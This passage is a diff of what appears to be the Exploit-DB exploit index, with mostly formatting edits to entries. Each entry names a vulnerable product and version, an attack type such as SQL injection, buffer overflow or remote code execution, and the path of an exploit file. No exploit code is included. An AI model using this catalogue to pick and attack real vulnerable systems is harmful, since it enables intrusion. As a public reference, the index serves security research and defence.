FTP OCX ActiveX Control 4.5.0.9 - 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",windows,dos,0 35877,platforms/php/webapps/35877.txt,"Sitemagic CMS 'SMTpl' Parameter Directory Traversal",2011-06-23,"Andrea Bocchetti",php,webapps,0 35878,platforms/php/webapps/35878.txt,"ecommerceMajor - SQL Injection And Authentication bypass",2015-01-22,"Manish Tanwar",php,webapps,0 35879,platforms/php/webapps/35879.txt,"WordPress Cforms Plugin 14.7 - Remote Code Execution",2015-01-19,Zakhar,php,webapps,0 @@ -32346,7 +32346,7 @@ id,file,description,date,author,platform,type,port 35882,platforms/php/webapps/35882.txt,"Nodesforum '_nodesforum_node' Parameter SQL Injection",2011-06-23,"Andrea Bocchetti",php,webapps,0 35883,platforms/php/webapps/35883.txt,"Joomla! 'com_morfeoshow' Component 'idm' Parameter SQL Injection",2011-06-27,Th3.xin0x,php,webapps,0 35884,platforms/php/webapps/35884.txt,"Mambo CMS 4.6.x Multiple Cross Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0 -35885,platforms/windows/remote/35885.txt,"Ubisoft CoGSManager ActiveX Control 1.0.0.23 'Initialize()' Method Stack Buffer Overflow",2011-06-27,"Luigi Auriemma",windows,remote,0 +35885,platforms/windows/remote/35885.txt,"Ubisoft CoGSManager ActiveX Control 1.0.0.23 - 'Initialize()' Method Stack Buffer Overflow",2011-06-27,"Luigi Auriemma",windows,remote,0 35886,platforms/windows/remote/35886.txt,"Sybase Advantage Server 10.0.0.3 - 'ADS' Process Off By One Buffer Overflow",2011-06-27,"Luigi Auriemma",windows,remote,0 35887,platforms/hardware/remote/35887.txt,"Cisco Ironport Appliances - Privilege Escalation",2015-01-22,"Glafkos Charalambous ",hardware,remote,0 35992,platforms/windows/local/35992.c,"K7 Computing Multiple Products - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 @@ -32374,16 +32374,16 @@ id,file,description,date,author,platform,type,port 35911,platforms/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",multiple,webapps,0 36313,platforms/php/webapps/36313.txt,"webERP <= 4.3.8 Multiple Script URI XSS",2011-11-17,"High-Tech Bridge SA",php,webapps,0 35982,platforms/windows/webapps/35982.txt,"Hewlett-Packard UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",windows,webapps,8080 -35983,platforms/windows/local/35983.rb,"MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape",2015-02-03,metasploit,windows,local,0 +35983,platforms/windows/local/35983.rb,"MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape",2015-02-03,Metasploit,windows,local,0 35988,platforms/php/webapps/35988.txt,"Support Incident Tracker (SiT!) 3.63 p1 - tasks.php selected[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 -35989,platforms/php/webapps/35989.txt,"MBoard 1.3 'url' Parameter URI Redirection",2011-07-27,"High-Tech Bridge SA",php,webapps,0 +35989,platforms/php/webapps/35989.txt,"MBoard 1.3 - 'url' Parameter URI Redirection",2011-07-27,"High-Tech Bridge SA",php,webapps,0 35990,platforms/php/webapps/35990.txt,"PHPJunkYard GBook 1.6/1.7 Multiple Cross Site Scripting Vulnerabilities",2011-07-27,"High-Tech Bridge SA",php,webapps,0 35991,platforms/php/webapps/35991.txt,"Pragyan CMS 3.0 - SQL Injection",2015-02-04,"Steffen Rösemann",php,webapps,80 35914,platforms/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",php,webapps,80 35915,platforms/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",multiple,webapps,0 35916,platforms/php/webapps/35916.txt,"WordPress Photo Gallery Plugin 1.2.5 - Unrestricted File Upload",2014-11-11,"Kacper Szurek",php,webapps,80 35917,platforms/hardware/remote/35917.txt,"D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit",2015-01-27,"Todor Donev",hardware,remote,0 -35918,platforms/multiple/remote/35918.c,"IBM DB2 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution",2011-06-30,"Tim Brown",multiple,remote,0 +35918,platforms/multiple/remote/35918.c,"IBM DB2 - 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution",2011-06-30,"Tim Brown",multiple,remote,0 35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 Multiple 'libc/net' Functions Stack Buffer Overflow",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0 35920,platforms/php/webapps/35920.txt,"WebCalendar 1.2.3 Multiple Cross Site Scripting Vulnerabilities",2011-07-04,"Stefan Schurtz",php,webapps,0 35921,platforms/windows/remote/35921.html,"iMesh 10.0 - 'IMWebControl.dll' ActiveX Control Buffer Overflow",2011-07-04,KedAns-Dz,windows,remote,0 @@ -32403,7 +32403,7 @@ id,file,description,date,author,platform,type,port 35935,platforms/windows/local/35935.py,"UniPDF 1.1 - Crash PoC (SEH overwritten)",2015-01-29,bonze,windows,local,0 35936,platforms/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Privilege Escalation",2015-01-29,KoreLogic,windows,local,0 35938,platforms/freebsd/dos/35938.txt,"FreeBSD Kernel - Multiple Vulnerabilities",2015-01-29,"Core Security",freebsd,dos,0 -35939,platforms/hardware/dos/35939.txt,"Alice Modem 1111 'rulename' Parameter Cross Site Scripting and Denial of Service Vulnerabilities",2011-07-12,"Moritz Naumann",hardware,dos,0 +35939,platforms/hardware/dos/35939.txt,"Alice Modem 1111 - 'rulename' Parameter Cross Site Scripting and Denial of Service Vulnerabilities",2011-07-12,"Moritz Naumann",hardware,dos,0 35940,platforms/php/webapps/35940.txt,"Sphider 1.3.x Admin Panel Multiple SQL Injection Vulnerabilities",2011-07-12,"Karthik R",php,webapps,0 35941,platforms/multiple/webapps/35941.txt,"Flowplayer 3.2.7 linkUrl' Parameter Cross Site Scripting",2011-07-12,"Szymon Gruszecki",multiple,webapps,0 35942,platforms/php/webapps/35942.txt,"TCExam 11.2.x Multiple Cross Site Scripting Vulnerabilities",2011-07-13,"Gjoko Krstic",php,webapps,0 @@ -32437,7 +32437,7 @@ id,file,description,date,author,platform,type,port 35971,platforms/php/webapps/35971.txt,"WordPress bSuite Plugin 4.0.7 - Multiple HTML Injection Vulnerabilities",2011-07-11,IHTeam,php,webapps,0 35972,platforms/php/webapps/35972.txt,"Sefrengo CMS 1.6.1 - Multiple SQL Injection Vulnerabilities",2015-02-02,"ITAS Team",php,webapps,0 35973,platforms/php/webapps/35973.txt,"Joomla! 1.6.5 and Prior Multiple Cross Site Scripting Vulnerabilities",2011-07-20,"YGN Ethical Hacker Group",php,webapps,0 -35974,platforms/php/webapps/35974.txt,"Tiki Wiki CMS Groupware <= 7.2 'snarf_ajax.php' Cross Site Scripting",2011-07-20,"High-Tech Bridge SA",php,webapps,0 +35974,platforms/php/webapps/35974.txt,"Tiki Wiki CMS Groupware <= 7.2 - 'snarf_ajax.php' Cross Site Scripting",2011-07-20,"High-Tech Bridge SA",php,webapps,0 35975,platforms/php/webapps/35975.txt,"Cyberoam UTM Multiple Cross Site Scripting Vulnerabilities",2011-07-20,"Patrick Webster",php,webapps,0 35976,platforms/php/webapps/35976.txt,"Synergy Software 'id' Parameter SQL Injection",2011-07-21,Ehsan_Hp200,php,webapps,0 35977,platforms/php/webapps/35977.txt,"Godly Forums 'id' Parameter SQL Injection",2011-07-25,3spi0n,php,webapps,0 @@ -32445,10 +32445,10 @@ id,file,description,date,author,platform,type,port 35979,platforms/php/webapps/35979.txt,"Willscript Recipes Website Script Silver Edition 'viewRecipe.php' SQL Injection",2011-07-25,Lazmania61,php,webapps,0 36040,platforms/php/webapps/36040.txt,"Chamilo LMS 1.9.8 Blind SQL Injection",2015-02-09,"Kacper Szurek",php,webapps,80 36000,platforms/php/webapps/36000.txt,"HP Network Automation <= 9.10 SQL Injection",2011-07-28,anonymous,php,webapps,0 -36001,platforms/asp/webapps/36001.txt,"Sitecore CMS <= 6.4.1 'url' Parameter URI Redirection",2011-07-28,"Tom Neaves",asp,webapps,0 +36001,platforms/asp/webapps/36001.txt,"Sitecore CMS <= 6.4.1 - 'url' Parameter URI Redirection",2011-07-28,"Tom Neaves",asp,webapps,0 36002,platforms/jsp/webapps/36002.txt,"IBM Tivoli Service Automation Manager 7.2.4 - Remote Code Execution",2014-12-12,"Jakub Palaczynski",jsp,webapps,0 36003,platforms/php/webapps/36003.txt,"Curverider Elgg <= 1.7.9 Multiple Cross Site Scripting Vulnerabilities",2011-08-01,"Aung Khant",php,webapps,0 -36004,platforms/multiple/remote/36004.txt,"Skype <= 5.3 'Mobile Phone' Field HTML Injection",2011-08-01,noptrix,multiple,remote,0 +36004,platforms/multiple/remote/36004.txt,"Skype <= 5.3 - 'Mobile Phone' Field HTML Injection",2011-08-01,noptrix,multiple,remote,0 36005,platforms/php/webapps/36005.txt,"MyBB MyTabs Plugin 'tab' Parameter SQL Injection",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 36006,platforms/multiple/remote/36006.java,"Open Handset Alliance Android 2.3.4/3.1 - Browser Sandbox Security Bypass",2011-08-02,"Roee Hay",multiple,remote,0 36007,platforms/multiple/dos/36007.txt,"AzeoTech DAQFactory Denial of Service",2011-06-24,"Knud Erik Hojgaard",multiple,dos,0 @@ -32457,13 +32457,13 @@ id,file,description,date,author,platform,type,port 36010,platforms/asp/webapps/36010.txt,"BESNI OKUL PORTAL 'sayfa.asp' Cross Site Scripting",2011-08-03,Err0R,asp,webapps,0 36011,platforms/asp/webapps/36011.txt,"Ataccan E-ticaret Scripti 'id' Parameter SQL Injection",2011-08-03,Err0R,asp,webapps,0 36012,platforms/php/webapps/36012.txt,"Joomla! Slideshow Gallery Component 'id' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0 -36013,platforms/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 'pysmb.py' Remote Arbitrary Shell Command Execution",2011-08-03,daveb,multiple,remote,0 +36013,platforms/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Remote Arbitrary Shell Command Execution",2011-08-03,daveb,multiple,remote,0 36014,platforms/hardware/remote/36014.pl,"LG DVR LE6016D - Unauthenticated Remote Users/Passwords Disclosure exploit",2015-02-07,"Todor Donev",hardware,remote,0 36015,platforms/php/webapps/36015.txt,"Joomla! 'com_community' Component 'userid' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0 -36016,platforms/multiple/remote/36016.txt,"Xpdf 3.02-13 'zxpdf' Security Bypass",2011-08-04,"Chung-chieh Shan",multiple,remote,0 +36016,platforms/multiple/remote/36016.txt,"Xpdf 3.02-13 - 'zxpdf' Security Bypass",2011-08-04,"Chung-chieh Shan",multiple,remote,0 36017,platforms/php/webapps/36017.txt,"HESK 2.2 Multiple Cross Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps,0 36018,platforms/php/webapps/36018.txt,"WordPress WP e-Commerce Plugin 3.8.6 - 'cart_messages[]' Parameter Cross Site Scripting",2011-08-04,"High-Tech Bridge SA",php,webapps,0 -36019,platforms/asp/webapps/36019.txt,"Community Server 2007/2008 'TagSelector.aspx' Cross Site Scripting",2011-08-04,PontoSec,asp,webapps,0 +36019,platforms/asp/webapps/36019.txt,"Community Server 2007/2008 - 'TagSelector.aspx' Cross Site Scripting",2011-08-04,PontoSec,asp,webapps,0 36020,platforms/windows/remote/36020.txt,"Microsoft Visual Studio Report Viewer 2005 Control Multiple Cross Site Scripting Vulnerabilities",2011-08-09,"Adam Bixby",windows,remote,0 36041,platforms/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",php,webapps,80 36022,platforms/windows/dos/36022.py,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow PoC (1)",2015-02-09,"Samandeep Singh",windows,dos,0 @@ -32485,7 +32485,7 @@ id,file,description,date,author,platform,type,port 36038,platforms/php/webapps/36038.txt,"WordPress eShop Plugin 6.2.8 - Multiple Cross Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0 39386,platforms/php/webapps/39386.txt,"iScripts EasyCreate 3.0 - Multiple Vulnerabilities",2016-02-01,"Bikramaditya Guha",php,webapps,80 36042,platforms/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure",2015-02-10,"Yakir Wizman",hardware,webapps,0 -36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart - Unrestricted File Upload",2015-02-10,metasploit,php,webapps,80 +36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart - Unrestricted File Upload",2015-02-10,Metasploit,php,webapps,80 36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 - 'ffgb_admin.php' Remote File Include",2011-08-11,"RiRes Walid",php,webapps,0 36045,platforms/cgi/remote/36045.txt,"SurgeFTP 23b6 Multiple Cross Site Scripting Vulnerabilities",2011-08-16,"Houssam Sahli",cgi,remote,0 36046,platforms/php/webapps/36046.txt,"phpWebSite 'page_id' Parameter Cross Site Scripting",2011-08-17,Ehsan_Hp200,php,webapps,0 @@ -32498,7 +32498,7 @@ id,file,description,date,author,platform,type,port 36053,platforms/windows/local/36053.py,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow (2)",2015-02-11,"dogo h@ck",windows,local,0 36054,platforms/php/webapps/36054.txt,"WordPress Survey and Poll Plugin 1.1 - Blind SQL Injection",2015-02-11,"Securely (Yoo Hee man)",php,webapps,80 36055,platforms/php/webapps/36055.txt,"Pandora FMS 5.1 SP1 - SQL Injection",2015-02-11,Vulnerability-Lab,php,webapps,8080 -36056,platforms/windows/remote/36056.rb,"Achat 0.150 beta7 - Buffer Overflow (Metasploit)",2015-02-11,metasploit,windows,remote,9256 +36056,platforms/windows/remote/36056.rb,"Achat 0.150 beta7 - Buffer Overflow (Metasploit)",2015-02-11,Metasploit,windows,remote,9256 36057,platforms/cgi/webapps/36057.txt,"IBM Endpoint Manager - Stored XSS",2015-02-11,"RedTeam Pentesting",cgi,webapps,52311 36070,platforms/php/dos/36070.txt,"PHP Prior to 5.3.7 Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities",2011-08-19,"Maksymilian Arciemowicz",php,dos,0 36061,platforms/php/webapps/36061.php,"WordPress Webdorado Spider Event Calendar 1.4.9 - SQL Injection",2015-02-13,"Mateusz Lach",php,webapps,0 @@ -32510,20 +32510,20 @@ id,file,description,date,author,platform,type,port 36067,platforms/cfm/webapps/36067.txt,"Adobe ColdFusion - 'probe.cfm' Cross Site Scripting",2011-08-18,G.R0b1n,cfm,webapps,0 36068,platforms/php/webapps/36068.txt,"MantisBT <= 1.1.8 Cross Site Scripting and SQL Injection Vulnerabilities",2011-08-18,Net.Edit0r,php,webapps,0 36071,platforms/windows/dos/36071.py,"Xlight FTP Server 3.7 Remote Buffer Overflow",2011-08-19,KedAns-Dz,windows,dos,0 -36072,platforms/php/webapps/36072.txt,"OneFileCMS 1.1.1 'onefilecms.php' Cross Site Scripting",2011-08-21,mr.pr0n,php,webapps,0 -36073,platforms/php/webapps/36073.txt,"Pandora FMS 3.x 'index.php' Cross Site Scripting",2011-08-22,"mehdi boukazoula",php,webapps,0 -36074,platforms/php/webapps/36074.txt,"TotalShopUK 1.7.2 'index.php' SQL Injection",2011-08-22,"Eyup CELIK",php,webapps,0 +36072,platforms/php/webapps/36072.txt,"OneFileCMS 1.1.1 - 'onefilecms.php' Cross Site Scripting",2011-08-21,mr.pr0n,php,webapps,0 +36073,platforms/php/webapps/36073.txt,"Pandora FMS 3.x - 'index.php' Cross Site Scripting",2011-08-22,"mehdi boukazoula",php,webapps,0 +36074,platforms/php/webapps/36074.txt,"TotalShopUK 1.7.2 - 'index.php' SQL Injection",2011-08-22,"Eyup CELIK",php,webapps,0 36075,platforms/windows/remote/36075.py,"Freefloat FTP Server 'ALLO' Command Remote Buffer Overflow",2011-08-20,Black.Spook,windows,remote,0 -36076,platforms/php/webapps/36076.txt,"Concrete 5.4.1 1 'rcID' Parameter Cross Site Scripting",2011-08-22,"Aung Khant",php,webapps,0 +36076,platforms/php/webapps/36076.txt,"Concrete 5.4.1 1 - 'rcID' Parameter Cross Site Scripting",2011-08-22,"Aung Khant",php,webapps,0 36077,platforms/php/webapps/36077.txt,"Open Classifieds 1.7.2 Multiple Cross Site Scripting Vulnerabilities",2011-08-23,"Yassin Aboukir",php,webapps,0 36078,platforms/windows/remote/36078.py,"PCMan FTP Server 2.0.7 - Buffer Overflow MKD Command",2015-02-14,R-73eN,windows,remote,0 36079,platforms/php/webapps/36079.txt,"CommodityRentals Real Estate Script 'txtsearch' Parameter HTML Injection",2011-08-24,"Eyup CELIK",php,webapps,0 36080,platforms/php/webapps/36080.txt,"Tourismscripts Hotel Portal 'hotel_city' Parameter HTML Injection",2011-08-24,"Eyup CELIK",php,webapps,0 36081,platforms/php/webapps/36081.txt,"VicBlog 'tag' Parameter SQL Injection",2011-08-24,"Eyup CELIK",php,webapps,0 -36082,platforms/php/webapps/36082.pl,"Zazavi 1.2.1 'filemanager/controller.php' Arbitrary File Upload",2011-08-25,KedAns-Dz,php,webapps,0 +36082,platforms/php/webapps/36082.pl,"Zazavi 1.2.1 - 'filemanager/controller.php' Arbitrary File Upload",2011-08-25,KedAns-Dz,php,webapps,0 36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 - '[img]' BBCode Tag Cross Site Request Forgery",2011-08-25,"Christian Yerena",php,webapps,0 -36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 'index.php' Cross-Site Request Forgery",2011-08-26,Caddy-Dz,php,webapps,0 -36085,platforms/php/webapps/36085.txt,"phpWebSite <= 1.7.1 'mod.php' SQL Injection",2011-08-27,Ehsan_Hp200,php,webapps,0 +36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 - 'index.php' Cross-Site Request Forgery",2011-08-26,Caddy-Dz,php,webapps,0 +36085,platforms/php/webapps/36085.txt,"phpWebSite <= 1.7.1 - 'mod.php' SQL Injection",2011-08-27,Ehsan_Hp200,php,webapps,0 36086,platforms/php/webapps/36086.txt,"WonderPlugin Audio Player 2.0 - Blind SQL Injection and XSS",2015-02-16,"Kacper Szurek",php,webapps,0 36087,platforms/php/webapps/36087.txt,"Fancybox for WordPress 3.0.2 - Stored XSS",2015-02-16,NULLpOint7r,php,webapps,0 36089,platforms/php/webapps/36089.txt,"eTouch SamePage 4.4.0.0.239 - Multiple Vulnerabilities",2015-02-16,"Brandon Perry",php,webapps,80 @@ -32532,13 +32532,13 @@ id,file,description,date,author,platform,type,port 36092,platforms/windows/dos/36092.pl,"MapServer <= 6.0 Map File Double Free Remote Denial of Service",2011-08-30,rouault,windows,dos,0 36093,platforms/php/webapps/36093.txt,"CS-Cart 2.2.1 - 'products.php' SQL Injection",2011-08-30,Net.Edit0r,php,webapps,0 36094,platforms/php/webapps/36094.txt,"TinyWebGallery 1.8.4 Local File Include and SQL Injection Vulnerabilities",2011-08-31,KedAns-Dz,php,webapps,0 -36095,platforms/php/webapps/36095.txt,"Serendipity 1.5.1 'research_display.php' SQL Injection",2011-08-31,The_Exploited,php,webapps,0 +36095,platforms/php/webapps/36095.txt,"Serendipity 1.5.1 - 'research_display.php' SQL Injection",2011-08-31,The_Exploited,php,webapps,0 36096,platforms/php/webapps/36096.txt,"Web Professional 'default.php' SQL Injection",2011-08-31,The_Exploited,php,webapps,0 36097,platforms/php/webapps/36097.txt,"Mambo CMS N-Skyrslur Cross Site Scripting",2011-09-02,CoBRa_21,php,webapps,0 36098,platforms/php/webapps/36098.html,"Guppy CMS 5.0.9 & 5.00.10 Authentication Bypass/Change Email",2015-02-17,"Brandon Murphy",php,webapps,80 36099,platforms/php/webapps/36099.html,"GuppY CMS 5.0.9 & 5.00.10 Multiple CSRF Vulnerabilities",2015-02-17,"Brandon Murphy",php,webapps,80 -36100,platforms/windows/remote/36100.rb,"X360 VideoPlayer ActiveX Control Buffer Overflow",2015-02-17,metasploit,windows,remote,0 -36101,platforms/java/remote/36101.rb,"Java JMX Server Insecure Configuration Java Code Execution",2015-02-17,metasploit,java,remote,1617 +36100,platforms/windows/remote/36100.rb,"X360 VideoPlayer ActiveX Control Buffer Overflow",2015-02-17,Metasploit,windows,remote,0 +36101,platforms/java/remote/36101.rb,"Java JMX Server Insecure Configuration Java Code Execution",2015-02-17,Metasploit,java,remote,1617 36102,platforms/php/webapps/36102.txt,"Mambo CMS N-Gallery Component SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36103,platforms/php/webapps/36103.txt,"Mambo CMS AHS Shop Component SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36104,platforms/windows/local/36104.py,"Publish-It 3.6d - Buffer Overflow (SEH) Exploit",2015-02-18,"Andrew Smith",windows,local,0 @@ -32550,15 +32550,15 @@ id,file,description,date,author,platform,type,port 36110,platforms/php/webapps/36110.txt,"ACal 2.2.6 'calendar.php' Cross Site Scripting",2011-09-02,T0xic,php,webapps,0 36111,platforms/windows/remote/36111.py,"Cerberus FTP Server 4.0.9.8 Remote Buffer Overflow",2011-09-05,KedAns-Dz,windows,remote,0 36112,platforms/php/webapps/36112.txt,"Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80 -36113,platforms/php/webapps/36113.txt,"YABSoft Advanced Image Hosting Script 2.3 'report.php' Cross Site Scripting",2011-09-05,R3d-D3V!L,php,webapps,0 -36114,platforms/php/webapps/36114.txt,"EasyGallery 5 'index.php' Multiple SQL Injection Vulnerabilities",2011-09-05,"Eyup CELIK",php,webapps,0 -36115,platforms/windows/remote/36115.txt,"Apple QuickTime 7.6.9 'QuickTimePlayer.dll' ActiveX Buffer Overflow",2011-09-06,"Ivan Sanchez",windows,remote,0 +36113,platforms/php/webapps/36113.txt,"YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross Site Scripting",2011-09-05,R3d-D3V!L,php,webapps,0 +36114,platforms/php/webapps/36114.txt,"EasyGallery 5 - 'index.php' Multiple SQL Injection Vulnerabilities",2011-09-05,"Eyup CELIK",php,webapps,0 +36115,platforms/windows/remote/36115.txt,"Apple QuickTime 7.6.9 - 'QuickTimePlayer.dll' ActiveX Buffer Overflow",2011-09-06,"Ivan Sanchez",windows,remote,0 36116,platforms/asp/webapps/36116.txt,"Kisanji 'gr' Parameter Cross Site Scripting",2011-09-06,Bl4ck.Viper,asp,webapps,0 36117,platforms/php/webapps/36117.txt,"GeoClassifieds Lite 2.0.x Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-09-06,"Yassin Aboukir",php,webapps,0 36124,platforms/php/remote/36124.txt,"jQuery jui_filter_rules PHP Code Execution",2015-02-19,"Timo Schmid",php,remote,80 -36121,platforms/php/webapps/36121.txt,"Zikula Application Framework 1.2.7/1.3 'themename' Parameter Cross Site Scripting",2011-09-05,"High-Tech Bridge SA",php,webapps,0 +36121,platforms/php/webapps/36121.txt,"Zikula Application Framework 1.2.7/1.3 - 'themename' Parameter Cross Site Scripting",2011-09-05,"High-Tech Bridge SA",php,webapps,0 36122,platforms/php/webapps/36122.txt,"SkaDate 'blogs.php' Cross Site Scripting",2011-09-08,sonyy,php,webapps,0 -36123,platforms/php/webapps/36123.txt,"In-link 2.3.4/5.1.3 RC1 'cat' Parameter SQL Injection",2011-09-08,SubhashDasyam,php,webapps,0 +36123,platforms/php/webapps/36123.txt,"In-link 2.3.4/5.1.3 RC1 - 'cat' Parameter SQL Injection",2011-09-08,SubhashDasyam,php,webapps,0 36126,platforms/multiple/webapps/36126.txt,"CrushFTP 7.2.0 - Multiple Vulnerabilities",2015-02-19,"Rehan Ahmed",multiple,webapps,8080 36127,platforms/php/webapps/36127.txt,"Piwigo 2.7.3 - Multiple Vulnerabilities",2015-02-19,"Steffen Rösemann",php,webapps,80 36128,platforms/windows/dos/36128.txt,"Wireshark <= 1.6.1 - Malformed Packet Trace File Remote Denial of Service",2011-09-08,Wireshark,windows,dos,0 @@ -32567,7 +32567,7 @@ id,file,description,date,author,platform,type,port 36131,platforms/php/webapps/36131.txt,"Papoo CMS Light 4.0 Multiple Cross Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps,0 36132,platforms/xml/webapps/36132.txt,"Pentaho < 4.5.0 - User Console XML Injection",2015-02-20,"K.d Long",xml,webapps,0 36411,platforms/win_x86/shellcode/36411.txt,"Windows XP x86-64 - Download & execute shellcode (Generator)",2015-03-16,"Ali Razmjoo",win_x86,shellcode,0 -36133,platforms/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 'CustomChart.aspx' Cross Site Scripting",2011-09-12,"Gustavo Roberto",asp,webapps,0 +36133,platforms/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 - 'CustomChart.aspx' Cross Site Scripting",2011-09-12,"Gustavo Roberto",asp,webapps,0 36134,platforms/asp/webapps/36134.txt,"Microsoft SharePoint 2007/2010 - 'Source' Parameter Multiple URI Open Redirection Vulnerabilities",2011-09-14,"Irene Abezgauz",asp,webapps,0 36135,platforms/php/webapps/36135.txt,"WordPress Auctions Plugin 1.8.8 - 'wpa_id' Parameter SQL Injection",2011-09-14,sherl0ck_,php,webapps,0 36136,platforms/php/webapps/36136.txt,"StarDevelop LiveHelp 2.0 - 'index.php' Local File Include",2011-09-15,KedAns-Dz,php,webapps,0 @@ -32579,15 +32579,15 @@ id,file,description,date,author,platform,type,port 36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products 'dir' parameters Multiple Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0 36143,platforms/osx/local/36143.txt,"Apple Mac OS X Lion Directory Services Security Bypass Vulnerabilities",2011-09-19,"Defence in Depth",osx,local,0 36144,platforms/php/webapps/36144.txt,"Card sharj 1.0 Multiple SQL Injection Vulnerabilities",2011-09-19,Net.Edit0r,php,webapps,0 -36145,platforms/windows/remote/36145.py,"IBM Lotus Domino 8.5.2 'NSFComputeEvaluateExt()' Function Remote Stack Buffer Overflow",2011-09-20,rmallof,windows,remote,0 -36146,platforms/asp/webapps/36146.txt,"i-Gallery 3.4 'd' Parameter Cross Site Scripting",2011-09-21,Kurd-Team,asp,webapps,0 +36145,platforms/windows/remote/36145.py,"IBM Lotus Domino 8.5.2 - 'NSFComputeEvaluateExt()' Function Remote Stack Buffer Overflow",2011-09-20,rmallof,windows,remote,0 +36146,platforms/asp/webapps/36146.txt,"i-Gallery 3.4 - 'd' Parameter Cross Site Scripting",2011-09-21,Kurd-Team,asp,webapps,0 36147,platforms/php/webapps/36147.txt,"Free Help Desk 1.1b Multiple Input Validation Vulnerabilities",2011-09-06,"High-Tech Bridge SA",php,webapps,0 36148,platforms/php/webapps/36148.txt,"phpRS 2.8.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2011-09-18,iM4n,php,webapps,0 36149,platforms/php/webapps/36149.txt,"OneCMS 2.6.4 Multiple SQL Injection Vulnerabilities",2011-09-21,"kurdish hackers team",php,webapps,0 36150,platforms/php/webapps/36150.txt,"Zyncro 3.0.1.20 Multiple HTML Injection Vulnerabilities",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0 36151,platforms/php/webapps/36151.txt,"Zyncro 3.0.1.20 Social Network Message Menu SQL Injection",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0 36152,platforms/windows/dos/36152.html,"Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC",2015-02-22,"Praveen Darshanam",windows,dos,0 -36169,platforms/multiple/remote/36169.rb,"HP Client - Automation Command Injection",2015-02-24,metasploit,multiple,remote,3465 +36169,platforms/multiple/remote/36169.rb,"HP Client - Automation Command Injection",2015-02-24,Metasploit,multiple,remote,3465 36154,platforms/php/webapps/36154.txt,"Beehive Forum 1.4.4 - Stored XSS",2015-02-23,"Halil Dalabasmaz",php,webapps,0 36155,platforms/php/webapps/36155.php,"WeBid 1.1.1 Unrestricted File Upload Exploit",2015-02-23,"CWH Underground",php,webapps,80 36156,platforms/php/webapps/36156.txt,"Clipbucket 2.7 RC3 0.9 - Blind SQL Injection",2015-02-23,"CWH Underground",php,webapps,80 @@ -32627,29 +32627,29 @@ id,file,description,date,author,platform,type,port 36191,platforms/php/webapps/36191.txt,"WordPress RedLine Theme 1.65 - 's' Parameter Cross Site Scripting",2011-09-30,SiteWatch,php,webapps,0 36192,platforms/php/webapps/36192.txt,"A2CMS 'index.php' Local File Disclosure",2011-09-28,St493r,php,webapps,0 36193,platforms/php/webapps/36193.txt,"WordPress WP Bannerize 2.8.7 - 'ajax_sorter.php' SQL Injection",2011-09-30,"Miroslav Stampar",php,webapps,0 -36194,platforms/php/webapps/36194.txt,"ProjectForum 7.0.1 3038 'more' Object HTML Injection",2011-09-30,"Paul Davis",php,webapps,0 +36194,platforms/php/webapps/36194.txt,"ProjectForum 7.0.1 3038 - 'more' Object HTML Injection",2011-09-30,"Paul Davis",php,webapps,0 36195,platforms/php/webapps/36195.txt,"WordPress Trending 0.1 - 'cpage' Parameter Cross Site Scripting",2011-09-24,SiteWatch,php,webapps,0 36196,platforms/php/webapps/36196.txt,"SonicWall Viewpoint 6.0 - 'scheduleID' Parameter SQL Injection",2011-10-02,Rem0ve,php,webapps,0 36197,platforms/php/webapps/36197.txt,"ezCourses admin.asp Security Bypass",2011-10-01,J.O,php,webapps,0 36198,platforms/multiple/dos/36198.pl,"Polipo 1.0.4.1 